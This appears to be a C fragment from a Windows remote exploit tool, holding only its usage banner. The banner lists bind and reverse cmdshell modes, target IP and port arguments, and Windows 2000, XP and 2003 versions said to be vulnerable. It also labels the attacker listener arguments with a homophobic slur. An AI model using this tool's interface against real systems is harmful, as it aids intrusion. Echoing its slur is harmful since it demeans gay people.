
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int printf (char*) ;

void usage(char* us)
{
  printf("                                                                                \n");
 printf("      [+]  . 101_SentLM.exe Target VulnIP (bind mode)                           \n");
 printf("      [+]  . 101_SentLM.exe Target VulnIP VulnPORT (bind mode)                  \n");
 printf("      [+]  . 101_SentLM.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
 printf("TARGETS:                                                                        \n");
 printf("      [+] 1. Win2k  SP4  Server English (*) - v5.0.2195                         \n");
 printf("      [+] 1. Win2k  SP4  Pro    English (*) - v5.0.2195                         \n");
 printf("      [+] 2. WinXP  SP0  Pro.   English (*) - v5.1.2600                         \n");
 printf("      [+] 2. WinXP  SP1  Pro.   English (*) - v5.1.2600                         \n");
 printf("      [+] 2. WinXP  SP1a Pro.   English (*) - v5.1.2600                         \n");
 printf("      [+] 3. WinXP  SP2  Pro.   English (*) - v5.1.2600.2180                    \n");
 printf("      [+] 4. Win2k3 SP0  Server English (*) - v5.2.3790                         \n");
 printf("NOTE:                                                                           \n");
 printf("      The exploit bind a cmdshell port 101 or                                   \n");
 printf("      reverse a cmdshell on your listener.                                      \n");
 printf("      A wildcard (*) mean tested working, else, supposed working.               \n");
 printf("      A symbol   (-) mean all.                                                  \n");
 printf("      Compilation msvc6, cygwin, Linux.                                         \n");
 printf("                                                                                \n");
 return;
}
